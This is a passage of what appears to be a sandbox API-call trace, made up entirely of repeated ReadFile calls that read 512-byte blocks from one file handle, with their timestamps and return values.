lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.950] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.950] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, 